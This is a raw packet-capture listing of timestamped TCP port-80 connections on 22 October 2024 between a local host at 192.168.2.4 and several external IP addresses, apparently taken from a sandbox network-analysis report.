                                                                                                      Oct 22, 2024 09:05:55.923209906 CEST8050025103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:56.859261990 CEST8050025103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:56.912642002 CEST5002580192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:57.038837910 CEST8050025103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:57.038959026 CEST5002580192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:57.429745913 CEST5002580192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:58.448483944 CEST5002680192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:58.453814983 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.453901052 CEST5002680192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:58.468015909 CEST5002680192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:58.473324060 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473335981 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473351955 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473361015 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473418951 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473428965 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473438025 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473517895 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:58.473526955 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:59.418543100 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:59.459609032 CEST5002680192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:59.596740961 CEST8050026103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:59.597656965 CEST5002680192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:59.977582932 CEST5002680192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:06:01.201524973 CEST5002780192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:06:01.206897020 CEST8050027103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:06:01.206979990 CEST5002780192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:06:01.246277094 CEST5002780192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:06:01.251508951 CEST8050027103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:06:02.166224957 CEST8050027103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:06:02.209670067 CEST5002780192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:06:02.345446110 CEST8050027103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:06:02.345591068 CEST5002780192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:06:02.346843958 CEST5002780192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:06:02.352108955 CEST8050027103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:06:07.370357037 CEST5002880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:07.376096010 CEST80500283.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:07.376234055 CEST5002880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:07.387543917 CEST5002880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:07.392911911 CEST80500283.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:08.017153978 CEST80500283.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:08.017467022 CEST5002880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:08.897165060 CEST5002880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:08.902594090 CEST80500283.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:09.916268110 CEST5002980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:09.921734095 CEST80500293.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:09.925770998 CEST5002980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:09.936549902 CEST5002980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:09.942111015 CEST80500293.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:10.565438986 CEST80500293.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:10.565534115 CEST5002980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:11.444159031 CEST5002980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:11.449461937 CEST80500293.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.463027954 CEST5003080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:12.468540907 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.468620062 CEST5003080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:12.481451988 CEST5003080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:12.486860991 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.486875057 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.486892939 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.486905098 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.486958981 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.486969948 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.486979008 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.487127066 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:12.487143993 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:13.096780062 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:13.096862078 CEST5003080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:13.991653919 CEST5003080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:13.997014999 CEST80500303.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:15.011702061 CEST5003180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:15.017857075 CEST80500313.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:15.017934084 CEST5003180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:15.028068066 CEST5003180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:15.033354998 CEST80500313.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:22.737122059 CEST80500313.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:22.737566948 CEST80500313.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:22.737616062 CEST5003180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:22.740622997 CEST5003180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:22.745863914 CEST80500313.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:27.780925035 CEST5003280192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:27.786220074 CEST80500323.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:27.786864996 CEST5003280192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:27.799738884 CEST5003280192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:27.805160999 CEST80500323.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:29.303442001 CEST5003280192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:29.310633898 CEST80500323.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:29.310684919 CEST5003280192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:30.324894905 CEST5003380192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:30.330990076 CEST80500333.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:30.331120014 CEST5003380192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:30.343477964 CEST5003380192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:30.348799944 CEST80500333.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:31.850424051 CEST5003380192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:31.855988026 CEST80500333.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:31.859719038 CEST5003380192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:32.870368004 CEST5003480192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:32.875755072 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.875847101 CEST5003480192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:32.889802933 CEST5003480192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:32.895113945 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895186901 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895196915 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895311117 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895334005 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895348072 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895448923 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895534992 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:32.895560026 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:34.397176981 CEST5003480192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:34.402772903 CEST80500343.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:34.402884007 CEST5003480192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:35.416457891 CEST5003580192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:35.421806097 CEST80500353.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:35.423998117 CEST5003580192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:35.431185961 CEST5003580192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:35.436526060 CEST80500353.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:36.062623978 CEST80500353.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:36.063719988 CEST80500353.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:36.063839912 CEST5003580192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:36.065548897 CEST5003580192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:06:36.072046995 CEST80500353.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:06:41.152940035 CEST5003680192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:41.158277035 CEST8050036199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:41.158458948 CEST5003680192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:41.169209957 CEST5003680192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:41.174561977 CEST8050036199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:41.818844080 CEST8050036199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:41.818983078 CEST8050036199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:41.819331884 CEST5003680192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:41.850748062 CEST8050036199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:41.853549004 CEST5003680192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:42.678440094 CEST5003680192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:43.705634117 CEST5003780192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:43.710972071 CEST8050037199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:43.711129904 CEST5003780192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:43.721724033 CEST5003780192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:43.948471069 CEST8050037199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:44.330202103 CEST8050037199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:44.330292940 CEST8050037199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:44.330414057 CEST5003780192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:44.330871105 CEST8050037199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:44.331062078 CEST5003780192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:45.225325108 CEST5003780192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:46.246128082 CEST5003880192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:46.251418114 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.253679037 CEST5003880192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:46.265604973 CEST5003880192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:46.271054983 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271115065 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271125078 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271132946 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271140099 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271152973 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271178961 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271188974 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.271198034 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.889688015 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.889699936 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.889812946 CEST5003880192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:46.890160084 CEST8050038199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:46.890223026 CEST5003880192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:47.772178888 CEST5003880192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:48.792337894 CEST5003980192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:48.797744989 CEST8050039199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:48.797832966 CEST5003980192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:48.806298018 CEST5003980192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:48.811645985 CEST8050039199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:49.435789108 CEST8050039199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:49.435837030 CEST8050039199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:49.436172962 CEST8050039199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:49.440439939 CEST5003980192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:49.440439939 CEST5003980192.168.2.4199.59.243.227
                                                                                                      Oct 22, 2024 09:06:49.445862055 CEST8050039199.59.243.227192.168.2.4
                                                                                                      Oct 22, 2024 09:06:54.471941948 CEST5004080192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:54.477329969 CEST805004013.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:54.477423906 CEST5004080192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:54.490855932 CEST5004080192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:54.496172905 CEST805004013.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:55.179289103 CEST805004013.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:55.179363966 CEST5004080192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:56.009356022 CEST5004080192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:56.014914036 CEST805004013.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:57.040169954 CEST5004180192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:57.045541048 CEST805004113.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:57.045629025 CEST5004180192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:57.075201035 CEST5004180192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:57.082000017 CEST805004113.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:57.743900061 CEST805004113.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:57.744337082 CEST5004180192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:58.584693909 CEST5004180192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:58.636096954 CEST805004113.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.707767963 CEST5004280192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:59.713279009 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.721595049 CEST5004280192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:59.729607105 CEST5004280192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:06:59.735002041 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735016108 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735044956 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735094070 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735105991 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735119104 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735135078 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735163927 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:06:59.735174894 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:00.391072035 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:00.395618916 CEST5004280192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:01.241852045 CEST5004280192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:01.247243881 CEST805004213.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:02.299890995 CEST5004380192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:02.305223942 CEST805004313.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:02.307455063 CEST5004380192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:02.327716112 CEST5004380192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:02.333034992 CEST805004313.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:03.044328928 CEST805004313.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:03.044388056 CEST805004313.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:03.044507027 CEST5004380192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:03.044529915 CEST805004313.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:03.044567108 CEST5004380192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:03.048055887 CEST5004380192.168.2.413.248.169.48
                                                                                                      Oct 22, 2024 09:07:03.053458929 CEST805004313.248.169.48192.168.2.4
                                                                                                      Oct 22, 2024 09:07:08.737138033 CEST5004480192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:08.742455959 CEST805004438.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:08.742532015 CEST5004480192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:08.754178047 CEST5004480192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:08.759485960 CEST805004438.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:09.452936888 CEST805004438.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:09.452990055 CEST805004438.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:09.453119993 CEST5004480192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:09.505083084 CEST805004438.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:09.509661913 CEST5004480192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:10.259416103 CEST5004480192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:11.275345087 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:11.280795097 CEST805004538.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:11.280905008 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:11.293164015 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:11.298651934 CEST805004538.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:11.983941078 CEST805004538.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:11.983952999 CEST805004538.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:11.984030962 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:12.035173893 CEST805004538.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:12.035412073 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:12.803602934 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.857940912 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.863349915 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.864104986 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.905544043 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.911506891 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912678957 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912684917 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912791014 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912795067 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912805080 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912808895 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912818909 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912826061 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.565916061 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.565956116 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.566018105 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:14.617461920 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.617522955 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:15.413045883 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.432642937 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.438980103 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:16.441745996 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.453634024 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.458905935 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.153773069 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.153790951 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.153960943 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:17.204807043 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.205132008 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:17.206063986 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:17.211421013 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.255224943 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:22.260644913 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.260865927 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:22.270895958 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:22.276324034 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.881470919 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.881536007 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:23.777642012 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:23.783373117 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:24.791522026 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:24.796907902 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:24.796976089 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:24.809139967 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:24.814526081 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:25.433888912 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:25.434010029 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:26.319148064 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:26.328629017 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.338113070 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:27.343646049 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.343734980 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:27.354556084 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:27.360085964 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360097885 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360106945 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360151052 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360160112 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360168934 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360187054 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360196114 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360234976 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.988684893 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.988871098 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:28.866152048 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:28.871504068 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:29.884254932 CEST5005180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:29.889977932 CEST80500513.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:29.892168045 CEST5005180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:29.898114920 CEST5005180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:29.903454065 CEST80500513.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:31.443809986 CEST80500513.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:31.444097996 CEST80500513.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:31.444169044 CEST5005180192.168.2.43.33.130.190
